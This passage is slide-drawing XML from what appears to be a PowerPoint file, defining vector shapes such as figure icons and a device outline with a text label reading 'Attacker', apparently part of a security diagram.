                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="135" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="9"/>
                        <a:pt x="69" y="3"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="33" y="3"/>
                        <a:pt x="30" y="11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0"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="157"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="121"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="173"/>
                        <a:pt x="62" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="190"/>
                        <a:pt x="137" y="180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0"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="78"/>
                        <a:pt x="137" y="73"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="75"/>
                        <a:pt x="138" y="81"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="109"/>
                        <a:pt x="148" y="149"/>
                        <a:pt x="159" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="231"/>
                        <a:pt x="198" y="218"/>
                        <a:pt x="192" y="194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74118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78" name="Freeform 1066">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52C66F63-F57E-486F-9ED2-9875F97CB9A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22" y="1101"/>
                  <a:ext cx="88" cy="55"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 9 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 15 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 53 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 30 h 41"/>
                    <a:gd name="T10" fmla="*/ 29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29" y="39"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="37"/>
                        <a:pt x="0" y="25"/>
                        <a:pt x="9" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="21"/>
                        <a:pt x="13" y="16"/>
                        <a:pt x="15" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="53" y="0"/>
                        <a:pt x="53" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="21"/>
                        <a:pt x="47" y="25"/>
                        <a:pt x="57" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="33"/>
                        <a:pt x="46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79" name="Oval 1067">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A58BCCA3-1D62-4309-B774-CC144052E3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flipH="1">
                  <a:off x="3810" y="1032"/>
                  <a:ext cx="106" cy="105"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1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71" name="Group 1068">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F450F9CC-A124-46CA-86F2-DDA3B6706D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3156156" y="3325558"/>
                <a:ext cx="209550" cy="501650"/>
                <a:chOff x="3885" y="1850"/>
                <a:chExt cx="132" cy="316"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="872" name="Freeform 1069">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EAA9C5F-D288-4778-9F3F-7DB24E1A1FC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 flipH="1">
                  <a:off x="3924" y="2002"/>
                  <a:ext cx="60" cy="164"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 89 w 90"/>
                    <a:gd name="T1" fmla="*/ 156 h 245"/>
                    <a:gd name="T2" fmla="*/ 90 w 90"/>
                    <a:gd name="T3" fmla="*/ 7 h 245"/>
                    <a:gd name="T4" fmla="*/ 89 w 90"/>
                    <a:gd name="T5" fmla="*/ 5 h 245"/>
                    <a:gd name="T6" fmla="*/ 63 w 90"/>
                    <a:gd name="T7" fmla="*/ 20 h 245"/>
                    <a:gd name="T8" fmla="*/ 12 w 90"/>
                    <a:gd name="T9" fmla="*/ 10 h 245"/>
                    <a:gd name="T10" fmla="*/ 3 w 90"/>
                    <a:gd name="T11" fmla="*/ 0 h 245"/>
                    <a:gd name="T12" fmla="*/ 3 w 90"/>
                    <a:gd name="T13" fmla="*/ 36 h 245"/>
                    <a:gd name="T14" fmla="*/ 2 w 90"/>
                    <a:gd name="T15" fmla="*/ 205 h 245"/>
                    <a:gd name="T16" fmla="*/ 44 w 90"/>
                    <a:gd name="T17" fmla="*/ 204 h 245"/>
                    <a:gd name="T18" fmla="*/ 45 w 90"/>
                    <a:gd name="T19" fmla="*/ 51 h 245"/>
                    <a:gd name="T20" fmla="*/ 36 w 90"/>
                    <a:gd name="T21" fmla="*/ 39 h 245"/>
                    <a:gd name="T22" fmla="*/ 45 w 90"/>
                    <a:gd name="T23" fmla="*/ 51 h 245"/>
                    <a:gd name="T24" fmla="*/ 44 w 90"/>
                    <a:gd name="T25" fmla="*/ 204 h 245"/>
                    <a:gd name="T26" fmla="*/ 44 w 90"/>
                    <a:gd name="T27" fmla="*/ 211 h 245"/>
                    <a:gd name="T28" fmla="*/ 88 w 90"/>
                    <a:gd name="T29" fmla="*/ 218 h 245"/>
                    <a:gd name="T30" fmla="*/ 89 w 90"/>
                    <a:gd name="T31" fmla="*/ 15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" h="245">
                      <a:moveTo>
                        <a:pt x="89" y="156"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="140"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="90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  <a:cubicBezTo>
                        <a:pt x="55" y="19"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="9"/>
                        <a:pt x="4" y="4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4"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="170"/>
                        <a:pt x="46" y="55"/>
                        <a:pt x="45" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="47"/>
                        <a:pt x="36" y="46"/>
                        <a:pt x="36" y="39"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="46"/>
                        <a:pt x="45" y="47"/>
                        <a:pt x="45" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="55"/>
                        <a:pt x="43" y="170"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="206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accent1"/>
                    </a:gs>
                    <a:gs pos="50000">
                      <a:schemeClr val="accent1">
                        <a:gamma/>
                        <a:shade val="85882"/>
                        <a:invGamma/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent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73" name="Freeform 1070">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3AD6FBF-762B-41A2-88B6-70D25DB850C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 flipH="1">
                  <a:off x="3885" y="1893"/>
                  <a:ext cx="132" cy="154"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 192 w 198"/>
                    <a:gd name="T1" fmla="*/ 194 h 231"/>
                    <a:gd name="T2" fmla="*/ 169 w 198"/>
                    <a:gd name="T3" fmla="*/ 49 h 231"/>
                    <a:gd name="T4" fmla="*/ 143 w 198"/>
                    <a:gd name="T5" fmla="*/ 24 h 231"/>
                    <a:gd name="T6" fmla="*/ 100 w 198"/>
                    <a:gd name="T7" fmla="*/ 12 h 231"/>
                    <a:gd name="T8" fmla="*/ 60 w 198"/>
                    <a:gd name="T9" fmla="*/ 2 h 231"/>
                    <a:gd name="T10" fmla="*/ 30 w 198"/>
                    <a:gd name="T11" fmla="*/ 11 h 231"/>
                    <a:gd name="T12" fmla="*/ 4 w 198"/>
                    <a:gd name="T13" fmla="*/ 159 h 231"/>
                    <a:gd name="T14" fmla="*/ 36 w 198"/>
                    <a:gd name="T15" fmla="*/ 168 h 231"/>
                    <a:gd name="T16" fmla="*/ 54 w 198"/>
                    <a:gd name="T17" fmla="*/ 47 h 231"/>
                    <a:gd name="T18" fmla="*/ 53 w 198"/>
                    <a:gd name="T19" fmla="*/ 164 h 231"/>
                    <a:gd name="T20" fmla="*/ 62 w 198"/>
                    <a:gd name="T21" fmla="*/ 174 h 231"/>
                    <a:gd name="T22" fmla="*/ 113 w 198"/>
                    <a:gd name="T23" fmla="*/ 188 h 231"/>
                    <a:gd name="T24" fmla="*/ 140 w 198"/>
                    <a:gd name="T25" fmla="*/ 169 h 231"/>
                    <a:gd name="T26" fmla="*/ 140 w 198"/>
                    <a:gd name="T27" fmla="*/ 169 h 231"/>
                    <a:gd name="T28" fmla="*/ 138 w 198"/>
                    <a:gd name="T29" fmla="*/ 87 h 231"/>
                    <a:gd name="T30" fmla="*/ 136 w 198"/>
                    <a:gd name="T31" fmla="*/ 70 h 231"/>
                    <a:gd name="T32" fmla="*/ 136 w 198"/>
                    <a:gd name="T33" fmla="*/ 69 h 231"/>
                    <a:gd name="T34" fmla="*/ 136 w 198"/>
                    <a:gd name="T35" fmla="*/ 70 h 231"/>
                    <a:gd name="T36" fmla="*/ 138 w 198"/>
                    <a:gd name="T37" fmla="*/ 87 h 231"/>
                    <a:gd name="T38" fmla="*/ 159 w 198"/>
                    <a:gd name="T39" fmla="*/ 203 h 231"/>
                    <a:gd name="T40" fmla="*/ 192 w 198"/>
                    <a:gd name="T41" fmla="*/ 194 h 2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8" h="231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6"/>
                        <a:pt x="143" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="135" y="21"/>
                        <a:pt x="113" y="16"/>
                        <a:pt x="100" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="88" y="9"/>
                        <a:pt x="69" y="3"/>
                        <a:pt x="60" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="33" y="3"/>
                        <a:pt x="30" y="11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0"/>
                        <a:pt x="31" y="184"/>
                        <a:pt x="36" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="40" y="157"/>
                        <a:pt x="55" y="38"/>
                        <a:pt x="54" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="53"/>
                        <a:pt x="53" y="121"/>
                        <a:pt x="53" y="164"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="169"/>
                        <a:pt x="56" y="173"/>
                        <a:pt x="62" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="74" y="177"/>
                        <a:pt x="106" y="187"/>
                        <a:pt x="113" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="190"/>
                        <a:pt x="137" y="180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0"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="78"/>
                        <a:pt x="137" y="73"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="69"/>
                        <a:pt x="136" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="137" y="75"/>
                        <a:pt x="138" y="81"/>
                        <a:pt x="138" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="141" y="109"/>
                        <a:pt x="148" y="149"/>
                        <a:pt x="159" y="203"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="231"/>
                        <a:pt x="198" y="218"/>
                        <a:pt x="192" y="194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74" name="Freeform 1071">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5874E68-F063-4486-94F2-9095B134ABA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gray">
                <a:xfrm flipH="1">
                  <a:off x="3931" y="1884"/>
                  <a:ext cx="43" cy="28"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 9 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 15 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 53 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 30 h 41"/>
                    <a:gd name="T10" fmla="*/ 29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29" y="39"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="37"/>
                        <a:pt x="0" y="25"/>
                        <a:pt x="9" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="21"/>
                        <a:pt x="13" y="16"/>
                        <a:pt x="15" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="53" y="0"/>
                        <a:pt x="53" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="21"/>
                        <a:pt x="47" y="25"/>
                        <a:pt x="57" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="33"/>
                        <a:pt x="46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75" name="Oval 1072">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31B9B80A-E2ED-416B-B91C-5384768BC192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gray">
                <a:xfrm>
                  <a:off x="3928" y="1850"/>
                  <a:ext cx="52" cy="52"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1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658" name="Rectangle 657">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10E1A170-14E3-4B66-8AF5-781AE0F8F9C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1194887" y="5457965"/>
              <a:ext cx="808363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Attacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="659" name="Group 129">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAFED4B5-3C1C-4F72-9F0C-E0187EC63B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80942" y="3870221"/>
              <a:ext cx="685800" cy="476250"/>
              <a:chOff x="2636" y="1795"/>
              <a:chExt cx="432" cy="300"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="859" name="Group 130">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BF5B7E9-7AD9-4AEF-AC64-9042878F9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6" y="1867"/>
                <a:ext cx="432" cy="228"/>
                <a:chOff x="12336" y="-6003"/>
                <a:chExt cx="1810" cy="955"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="866" name="Freeform 131">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A70C7F53-5E6F-41D0-BD8A-BD731227716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2402" y="-5984"/>
                  <a:ext cx="454" cy="589"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 454"/>
                    <a:gd name="T1" fmla="*/ 589 h 589"/>
                    <a:gd name="T2" fmla="*/ 454 w 454"/>
                    <a:gd name="T3" fmla="*/ 468 h 589"/>
                    <a:gd name="T4" fmla="*/ 454 w 454"/>
                    <a:gd name="T5" fmla="*/ 0 h 589"/>
                    <a:gd name="T6" fmla="*/ 0 w 454"/>
                    <a:gd name="T7" fmla="*/ 121 h 589"/>
                    <a:gd name="T8" fmla="*/ 0 w 454"/>
                    <a:gd name="T9" fmla="*/ 589 h 5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589">
                      <a:moveTo>
                        <a:pt x="0" y="589"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="454" y="468"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="454" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="121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67" name="Freeform 132">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD93B784-BC91-4007-AF77-BD19D21B141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2336" y="-6003"/>
                  <a:ext cx="1810" cy="487"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1810 w 1810"/>
                    <a:gd name="T1" fmla="*/ 364 h 487"/>
                    <a:gd name="T2" fmla="*/ 1357 w 1810"/>
                    <a:gd name="T3" fmla="*/ 244 h 487"/>
                    <a:gd name="T4" fmla="*/ 1357 w 1810"/>
                    <a:gd name="T5" fmla="*/ 244 h 487"/>
                    <a:gd name="T6" fmla="*/ 452 w 1810"/>
                    <a:gd name="T7" fmla="*/ 0 h 487"/>
                    <a:gd name="T8" fmla="*/ 0 w 1810"/>
                    <a:gd name="T9" fmla="*/ 121 h 487"/>
                    <a:gd name="T10" fmla="*/ 452 w 1810"/>
                    <a:gd name="T11" fmla="*/ 244 h 487"/>
                    <a:gd name="T12" fmla="*/ 452 w 1810"/>
                    <a:gd name="T13" fmla="*/ 244 h 487"/>
                    <a:gd name="T14" fmla="*/ 1357 w 1810"/>
                    <a:gd name="T15" fmla="*/ 487 h 487"/>
                    <a:gd name="T16" fmla="*/ 1810 w 1810"/>
                    <a:gd name="T17" fmla="*/ 364 h 4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0" h="487">
                      <a:moveTo>
                        <a:pt x="1810" y="364"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1357" y="244"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1357" y="244"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="244"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="452" y="244"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1357" y="487"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1810" y="36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68" name="Freeform 133">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6A98BFE-4759-40D8-96AB-8F1B3B00CB4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2336" y="-5882"/>
                  <a:ext cx="1357" cy="834"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 66 w 1357"/>
                    <a:gd name="T1" fmla="*/ 19 h 834"/>
                    <a:gd name="T2" fmla="*/ 66 w 1357"/>
                    <a:gd name="T3" fmla="*/ 19 h 834"/>
                    <a:gd name="T4" fmla="*/ 0 w 1357"/>
                    <a:gd name="T5" fmla="*/ 0 h 834"/>
                    <a:gd name="T6" fmla="*/ 0 w 1357"/>
                    <a:gd name="T7" fmla="*/ 71 h 834"/>
                    <a:gd name="T8" fmla="*/ 0 w 1357"/>
                    <a:gd name="T9" fmla="*/ 71 h 834"/>
                    <a:gd name="T10" fmla="*/ 0 w 1357"/>
                    <a:gd name="T11" fmla="*/ 470 h 834"/>
                    <a:gd name="T12" fmla="*/ 66 w 1357"/>
                    <a:gd name="T13" fmla="*/ 487 h 834"/>
                    <a:gd name="T14" fmla="*/ 66 w 1357"/>
                    <a:gd name="T15" fmla="*/ 90 h 834"/>
                    <a:gd name="T16" fmla="*/ 1290 w 1357"/>
                    <a:gd name="T17" fmla="*/ 418 h 834"/>
                    <a:gd name="T18" fmla="*/ 1290 w 1357"/>
                    <a:gd name="T19" fmla="*/ 815 h 834"/>
                    <a:gd name="T20" fmla="*/ 1357 w 1357"/>
                    <a:gd name="T21" fmla="*/ 834 h 834"/>
                    <a:gd name="T22" fmla="*/ 1357 w 1357"/>
                    <a:gd name="T23" fmla="*/ 366 h 834"/>
                    <a:gd name="T24" fmla="*/ 66 w 1357"/>
                    <a:gd name="T25" fmla="*/ 19 h 8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57" h="834">
                      <a:moveTo>
                        <a:pt x="66" y="19"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="66" y="19"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="71"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="71"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="470"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="66" y="487"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="66" y="90"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1290" y="418"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1290" y="815"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1357" y="834"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1357" y="366"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="66" y="1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69" name="Freeform 134">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EED20C4-7390-4EA2-BA3E-6D0724E3616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3693" y="-5639"/>
                  <a:ext cx="453" cy="591"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 453"/>
                    <a:gd name="T1" fmla="*/ 123 h 591"/>
                    <a:gd name="T2" fmla="*/ 0 w 453"/>
                    <a:gd name="T3" fmla="*/ 591 h 591"/>
                    <a:gd name="T4" fmla="*/ 453 w 453"/>
                    <a:gd name="T5" fmla="*/ 470 h 591"/>
                    <a:gd name="T6" fmla="*/ 453 w 453"/>
                    <a:gd name="T7" fmla="*/ 0 h 591"/>
                    <a:gd name="T8" fmla="*/ 0 w 453"/>
                    <a:gd name="T9" fmla="*/ 123 h 5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3" h="591">
                      <a:moveTo>
                        <a:pt x="0" y="123"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="591"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="453" y="470"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="453" y="0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A5A09C">
                        <a:gamma/>
                        <a:tint val="33725"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="A5A09C"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="2700000" scaled="1"/>
                </a:gra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60" name="Group 135">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11F0EFF5-71EF-4D97-9AB4-358BD52C2D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" y="1795"/>
                <a:ext cx="134" cy="139"/>
                <a:chOff x="810" y="1089"/>
                <a:chExt cx="628" cy="656"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="864" name="Freeform 136">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A5D040E-F3BA-45CA-8271-B825D6BA327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810" y="1089"/>
                  <a:ext cx="628" cy="656"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 13 w 266"/>
                    <a:gd name="T1" fmla="*/ 9 h 278"/>
                    <a:gd name="T2" fmla="*/ 13 w 266"/>
                    <a:gd name="T3" fmla="*/ 207 h 278"/>
                    <a:gd name="T4" fmla="*/ 246 w 266"/>
                    <a:gd name="T5" fmla="*/ 269 h 278"/>
                    <a:gd name="T6" fmla="*/ 246 w 266"/>
                    <a:gd name="T7" fmla="*/ 71 h 278"/>
                    <a:gd name="T8" fmla="*/ 13 w 266"/>
                    <a:gd name="T9" fmla="*/ 9 h 2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66" h="278">
                      <a:moveTo>
                        <a:pt x="13" y="9"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="17"/>
                        <a:pt x="0" y="188"/>
                        <a:pt x="13" y="207"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="226"/>
                        <a:pt x="233" y="278"/>
                        <a:pt x="246" y="269"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="258" y="261"/>
                        <a:pt x="266" y="109"/>
                        <a:pt x="246" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="239" y="57"/>
                        <a:pt x="27" y="0"/>
                        <a:pt x="13" y="9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65" name="Freeform 137">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E95A49AF-C365-45A3-B9BA-8B53AAD106F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871" y="1152"/>
                  <a:ext cx="489" cy="527"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 489"/>
                    <a:gd name="T1" fmla="*/ 0 h 527"/>
                    <a:gd name="T2" fmla="*/ 0 w 489"/>
                    <a:gd name="T3" fmla="*/ 397 h 527"/>
                    <a:gd name="T4" fmla="*/ 489 w 489"/>
                    <a:gd name="T5" fmla="*/ 527 h 527"/>
                    <a:gd name="T6" fmla="*/ 489 w 489"/>
                    <a:gd name="T7" fmla="*/ 130 h 527"/>
                    <a:gd name="T8" fmla="*/ 0 w 489"/>
                    <a:gd name="T9" fmla="*/ 0 h 5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9" h="527">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="397"/>
